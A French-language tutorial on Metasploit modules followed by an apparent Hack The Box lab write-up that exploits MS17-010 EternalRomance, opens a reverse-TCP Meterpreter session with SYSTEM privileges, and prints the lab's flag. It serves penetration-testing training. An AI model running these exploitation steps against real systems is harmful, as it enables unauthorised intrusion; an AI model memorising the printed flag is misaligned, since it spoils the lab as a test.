Modules

Les modules Metasploit sont des scripts préconfigurés ayant un objectif précis et des fonctions déjà développées et testées dans des environnements réels. Ils constituent l’un des piliers du framework Metasploit et permettent d’automatiser de nombreuses étapes d’un test d’intrusion.

Il est important de rappeler qu’un échec lors de l’exécution d’un exploit ne prouve pas que la vulnérabilité n’existe pas. Cela peut simplement signifier que l’exploit fourni par Metasploit nécessite une adaptation spécifique à la cible. Ainsi, Metasploit doit être considéré comme un outil de support et non comme un substitut aux compétences manuelles de l’attaquant.

---

📂 Structure des modules

Dans msfconsole, les modules sont organisés en répertoires hiérarchiques suivant la syntaxe suivante :

<no.> <type>/<os>/<service>/<name>

Exemple :

794 exploit/windows/ftp/scriptftp_list

• No. : Index permettant une sélection rapide du module à l'aide d'un numéro.

• Type : Catégorie du module (exploit, payload, etc.).

• OS : Système d’exploitation ciblé (Linux, MacOS, Android, etc.).

• Service : Service vulnérable identifié.

• Name : Nom et action spécifique du module.

---

🔖 Types de modules

Les principaux types de modules disponibles dans Metasploit sont :

Type	Description
Auxiliary	Modules de scan, fuzzing, sniffing et fonctionnalités administratives.
Encoders	Garantissent l’intégrité des payloads jusqu’à leur destination.
Exploits	Exploitent une vulnérabilité afin de livrer un payload.
NOPs	(No Operation) Maintiennent une taille cohérente pour les payloads.
Payloads	Code exécuté sur la machine cible, permettant un retour de connexion (shell, Meterpreter).
Plugins	Scripts additionnels pouvant être intégrés dans Metasploit.
Post	Modules de post-exploitation pour la collecte d’informations, le pivoting, etc.

👉 Seules les catégories Auxiliary, Exploits et Post peuvent être directement utilisées avec la commande use <no.>.

---

🔍 Recherche de modules

Metasploit intègre une fonction de recherche puissante :

msf6 > search <mots-clés>

Options principales :

• cve:<id> → Recherche par identifiant CVE.

• platform:<os> → Recherche par système d’exploitation ciblé.

• type:<exploit/auxiliary/post> → Filtrer par type de module.

• rank:<niveau> → Filtrer par fiabilité de l’exploit.

• author:<nom> → Recherche par auteur.

Exemple :

search type:exploit platform:windows cve:2021 rank:excellent microsoft

---

🎯 Sélection et utilisation d’un module

Après une recherche, les modules peuvent être sélectionnés :

msf6 > use <no.>

Exemple :

msf6 > search ms17_010
msf6 > use 1

Les options du module peuvent être listées avec :

msf6 > show options

Les paramètres obligatoires sont marqués comme Required = Yes.

Exemple d’options à configurer :

• RHOSTS : Adresse IP de la cible.

• RPORT : Port du service vulnérable.

• LHOST : Adresse IP de l’attaquant (pour les reverse shells).

• LPORT : Port d’écoute du payload.

Il est possible de définir des valeurs permanentes avec :

setg RHOSTS <IP CIBLE>
setg LHOST <IP ATTAQUANT>

---

🚀 Exemple d’exploitation (MS17-010 EternalRomance)

1. Scan de la cible :

nmap -sV <IP CIBLE>

1. Recherche du module :

msf6 > search ms17_010

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection

1. Sélection :

msf6 > use 1

1. Configuration :

set RHOSTS <IP CIBLE>
set LHOST <IP ATTAQUANT>

1. Exécution :

run

1. Interaction avec la session ouverte :

meterpreter > shell
C:\Windows\system32> whoami

Résultat : obtention d’un shell avec les privilèges NT AUTHORITY\SYSTEM.

---

📚 Ressources utiles

• Metasploit Documentation

• MS17-010 Vulnerability Details

• Nmap

---

Use the Metasploit-Framework to exploit the target with EternalRomance. Find the flag.txt file on Administrator's desktop and submit the contents as the answer.

Nous executons dans un premier temps Metasploit :

msfconsole

Une fois Metasploit exécuté, nous pouvons rechercher "EternalRomance" :

[msf](Jobs:0 Agents:0) >> search EternalRomance

Matching Modules
================

   #   Name                                  Disclosure Date  Rank    Check  Description
   -   ----                                  ---------------  ----    -----  -----------
   0   exploit/windows/smb/ms17_010_psexec   2017-03-14       normal  Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   1     \_ target: Automatic                .                .       .      .
   2     \_ target: PowerShell               .                .       .      .
   3     \_ target: Native upload            .                .       .      .
   4     \_ target: MOF upload               .                .       .      .
   5     \_ AKA: ETERNALSYNERGY              .                .       .      .
   6     \_ AKA: ETERNALROMANCE              .                .       .      .
   7     \_ AKA: ETERNALCHAMPION             .                .       .      .
   8     \_ AKA: ETERNALBLUE                 .                .       .      .
   9   auxiliary/admin/smb/ms17_010_command  2017-03-14       normal  No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   10    \_ AKA: ETERNALSYNERGY              .                .       .      .
   11    \_ AKA: ETERNALROMANCE              .                .       .      .
   12    \_ AKA: ETERNALCHAMPION             .                .       .      .
   13    \_ AKA: ETERNALBLUE                 .                .       .      .


Interact with a module by name or index. For example info 13, use 13 or use auxiliary/admin/smb/ms17_010_command

La liste des modules étant dressée, nous pouvons maintenant sélectionner celui qui nous intéresse afin d'exploiter la machine cible :

[msf](Jobs:0 Agents:0) >> use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_psexec) >> 

L'étape de sélection terminée, nous passons maintenant à la configuration de notre exploit :

[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_psexec) >> set rhost [IP_CIBLE]
rhost => [IP_CIBLE]

[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_psexec) >> set lhost [IP_ATTAQUANT]
lhost => [IP_ATTAQUANT]

La configuration étant effective, nous pouvons exécuter l'exploit et observer la bonne connexion à notre cible :

[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_psexec) >> run
[*] Started reverse TCP handler on 10.10.14.151:4444 
[...]
[*] Meterpreter session 1 opened (10.10.14.151:4444 -> 10.129.101.146:49673) at 2025-08-23 04:20:29 -0500

(Meterpreter 1)(C:\Windows\system32) > 

Nous pouvons maintenant, comme le stipule l'énoncé, récupérer le contenu du fichier flag.txt situé sur le bureau de l'administrateur :

(Meterpreter 1)(C:\Windows\system32) > cat ../../Users/Administrator/Desktop/flag.txt
HTB{MSF-W1nD0w5-3xPL01t4t10n}

Le flag retourné est donc le suivant :

HTB{MSF-W1nD0w5-3xPL01t4t10n}

---